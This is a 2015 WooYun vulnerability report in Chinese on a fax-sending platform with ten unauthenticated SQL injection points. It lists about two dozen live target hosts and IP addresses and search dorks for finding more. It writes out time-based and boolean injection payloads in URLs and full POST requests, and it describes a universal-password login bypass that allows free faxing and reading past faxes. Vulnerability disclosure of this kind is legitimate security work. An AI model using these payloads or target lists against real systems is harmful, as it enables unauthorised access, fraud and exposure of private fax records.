当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110126

漏洞标题:某传真系统存在十处SQL注入无需登录(可免费发传真,查询以往传真内容等)

相关厂商:cncert

漏洞作者: YY-2012

提交时间:2015-04-24 15:25

修复时间:2015-07-27 09:50

公开时间:2015-07-27 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向第三方安全合作伙伴开放
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

发传真就像打电话一样,要计费的。我的妈啊。。这样系统你还敢用吗?

详细说明:

案例:

http://www.5fax.net/
http://119.145.255.46:8888/
http://202.104.186.93/
http://113.105.225.250:8888/
http://211.154.136.8:8080/
http://113.105.225.250/
http://124.232.137.215/
http://202.105.179.216:8888/
http://202.105.179.171:8888/
http://202.104.186.94:8888/
http://www.fax400800.net/
http://www.51fax.com/
http://www.ltfax.net:8080/
http://www.baoyuefax.com/
http://fax998.cn/
http://www.02309.com/
http://www.hdf518.net/
http://www.258fax.com/
http://sz.mmfax.com/
http://www.518fax.cn/
http://www.168talk.net/
http://hi.fax10000.net/
http://258fax.com:8888/


百度:intitle:"传真群发系统"
佛法:title="传真系统"
会找到更多案例。
万能密码可登录,当时登录后就惊呆了,可免费发传真,查询以往传真记录。。
10处注入都是无需登录的。

http://地址/user/action/fax_stat.php?current_page=1&findenddate=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&findstartdate=2015-04-19
参数findenddate
http://地址/user/action/fax_stat.php?current_page=1&findenddate=2015-04-23&findstartdate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
参数findstartdate
http://地址/user/bankpay/bankpay_check_account.php?account=-1'%20OR%203*2*1%3d6%20AND%20000355%3d000355%20--%20&action=check
参数account
http://地址/user/http/httpnews.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=html
http://地址/user/http/httprequest.php?area_code=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&groupid=1&requestcontent=number_section
参数area_code
http://地址/user/http/httprequest.php?province_code=hebei'%20AND%203*2*1%3d6%20AND%20'000zzp0'%3d'000zzp0&requestcontent=area
参数province_code
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e6%8f%90%e4%ba%a4&action=getpwd&email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&username=igwyhlgw
参数email
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e6%8f%90%e4%ba%a4&action=getpwd&email=sample%40email.tst&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
参数username
POST /user/bankpay/chargeportal_action.php HTTP/1.1
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
account=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&action=charge&channel=bank_ICBC&money=&orderAmount=1
参数account
POST /user/action/login_action.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://119.145.255.46:8888/index.html
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 119.145.255.46:8888
Content-Length: 80
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=cuiafoms2arf10c124vgfg6nr2
action=login&logintype=username&account=asdasd&password=asdasd&userauthcode=muoi
参数account    使用sqlmap的时候必须加time-sec才能注入。


可使用万能密码登录系统。

漏洞证明:

aaaaaaaaaaaaaaaaaaaaaa.jpg


bbbbbbbbbbbbbbbbbb.jpg


111111111111111.jpg


22222222222222.jpg


3333333333333.jpg


修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-04-28 09:48

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无